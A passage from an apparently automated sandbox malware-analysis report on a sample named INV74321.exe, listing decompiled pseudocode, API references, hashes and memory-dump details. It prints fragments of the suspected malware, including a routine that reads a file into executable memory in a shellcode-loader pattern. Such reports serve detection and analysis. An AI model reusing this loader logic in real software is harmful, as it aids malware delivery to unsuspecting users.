                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100011DA
                                                          • VirtualAlloc.KERNELBASE(00000000,00001A05,00003000,00000040), ref: 100011F4
                                                          • ReadFile.KERNELBASE(?,?,00001A05,00000000,00000000), ref: 1000120C
                                                          • EnumTimeFormatsW.KERNELBASE(?,00000000,00000000), ref: 100012FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.223616623.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.223600653.0000000010000000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.223633299.0000000010002000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: File$AllocCreateEnumFormatsReadTimeVirtual
                                                          • String ID:
                                                          • API String ID: 2368423067-0
                                                          • Opcode ID: 5f2e7b33338f4b70763c084f4509b78a69750c420f203546721e98bf2f2c58da
                                                          • Instruction ID: 2dd11465bb008b5e9aa66c17f2e67835f16e68c2c4290183200e47672db65918
                                                          • Opcode Fuzzy Hash: 5f2e7b33338f4b70763c084f4509b78a69750c420f203546721e98bf2f2c58da
                                                          • Instruction Fuzzy Hash: EF514D74D4C398BEDF01CBF48891BEDBFB4AF5A201F0481C9E590B6286D636574ACB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 60%
                                                          			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4f8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040521E(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                          0x0040209d
                                                          0x0040209d
                                                          0x004020a2
                                                          0x004020a9
                                                          0x00402164
                                                          0x004022dd
                                                          0x004022dd
                                                          0x00402a5a
                                                          0x00402a5d
                                                          0x00402a69
                                                          0x00402a69
                                                          0x004020b8
                                                          0x004020c2
                                                          0x004020c5
                                                          0x004020d4
                                                          0x004020d8
                                                          0x004020de
                                                          0x004020e2
                                                          0x0040215d
                                                          0x00000000
                                                          0x0040215d
                                                          0x004020e4
                                                          0x004020ed
                                                          0x004020f1
                                                          0x00402135
                                                          0x004020f3
                                                          0x004020f6
                                                          0x004020f9
                                                          0x00402129
                                                          0x004020fb
                                                          0x004020fe
                                                          0x00402107
                                                          0x00402109
                                                          0x00402109
                                                          0x00402107
                                                          0x004020f9
                                                          0x0040213d
                                                          0x00402152
                                                          0x00402152
                                                          0x00000000
                                                          0x0040213d
                                                          0x004020c8
                                                          0x004020ce
                                                          0x004020d2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422448,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,74B5EA30), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2987980305-0
                                                          • Opcode ID: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                                                          • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                          • Opcode Fuzzy Hash: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                                                          • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405B28(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405ABA(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405761(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E004056E4(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004060F7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                          0x004015bb
                                                          0x004015c2
                                                          0x004015c5
                                                          0x004015ca
                                                          0x004015ce
                                                          0x004015d0
                                                          0x004015d8
                                                          0x004015da
                                                          0x004015dc
                                                          0x004015e0
                                                          0x004015e3
                                                          0x004015fb
                                                          0x004015fc
                                                          0x004015e5
                                                          0x004015e5
                                                          0x004015e8
                                                          0x00000000
                                                          0x004015f3
                                                          0x004015f4
                                                          0x004015f4
                                                          0x004015e8
                                                          0x00401603
                                                          0x0040160a
                                                          0x00401617
                                                          0x00401617
                                                          0x0040160c
                                                          0x0040160d
                                                          0x00401615
                                                          0x00000000
                                                          0x00000000
                                                          0x00401615
                                                          0x0040160a
                                                          0x0040161a
                                                          0x0040161d
                                                          0x0040161f
                                                          0x00401620
                                                          0x004015d0
                                                          0x00401627
                                                          0x00401652
                                                          0x004022dd
                                                          0x00401629
                                                          0x0040162b
                                                          0x00401636
                                                          0x0040163c
                                                          0x00401644
                                                          0x0040164a
                                                          0x0040164a
                                                          0x00401644
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                            • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 1892508949-501415292
                                                          • Opcode ID: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                                                          • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                          • Opcode Fuzzy Hash: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                                                          • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 59%
                                                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f470;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec0c =  *0x42ec0c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
					}
				}
				return 0;
			}











                                                          0x0040138a
                                                          0x004013fa
                                                          0x0040139b
                                                          0x004013a0
                                                          0x00000000
                                                          0x00000000
                                                          0x004013a2
                                                          0x004013a3
                                                          0x004013ad
                                                          0x00000000
                                                          0x00401404
                                                          0x004013b0
                                                          0x004013b7
                                                          0x004013bd
                                                          0x004013be
                                                          0x004013c0
                                                          0x004013c2
                                                          0x004013b9
                                                          0x004013b9
                                                          0x004013ba
                                                          0x004013ba
                                                          0x004013c9
                                                          0x004013cb
                                                          0x004013f4
                                                          0x004013f4
                                                          0x004013c9
                                                          0x00000000

                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                          • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                          • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                          • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406500, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00406500(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E00406492(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                          0x00406508
                                                          0x0040650b
                                                          0x00406512
                                                          0x0040651a
                                                          0x00406526
                                                          0x00000000
                                                          0x0040652d
                                                          0x0040651d
                                                          0x00406524
                                                          0x00000000
                                                          0x00406535
                                                          0x00000000

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                            • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                            • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                            • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                          • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                          • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                          • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405C90, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E00405C90(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                          0x00405c94
                                                          0x00405ca1
                                                          0x00405cb6
                                                          0x00405cbc

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\INV74321.exe,80000000,00000003), ref: 00405C94
                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                          • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                          • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                          • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405C6B, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405C6B(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                          0x00405c70
                                                          0x00405c76
                                                          0x00405c7b
                                                          0x00405c84
                                                          0x00405c84
                                                          0x00405c8d

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                          • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                                                          • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                          • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405761, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405761(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                          0x00405767
                                                          0x0040576f
                                                          0x00000000
                                                          0x00405775
                                                          0x00000000

                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                          • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                          • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                          • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D08, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405D08(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                          0x00405d0c
                                                          0x00405d1c
                                                          0x00405d24
                                                          0x00000000
                                                          0x00405d2b
                                                          0x00000000
                                                          0x00405d2d

                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                          • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                          • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                          • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D37, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405D37(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                          0x00405d3b
                                                          0x00405d4b
                                                          0x00405d53
                                                          0x00000000
                                                          0x00405d5a
                                                          0x00000000
                                                          0x00405d5c

                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403300, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00403300(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                          0x0040330e
                                                          0x00403314

                                                          APIs
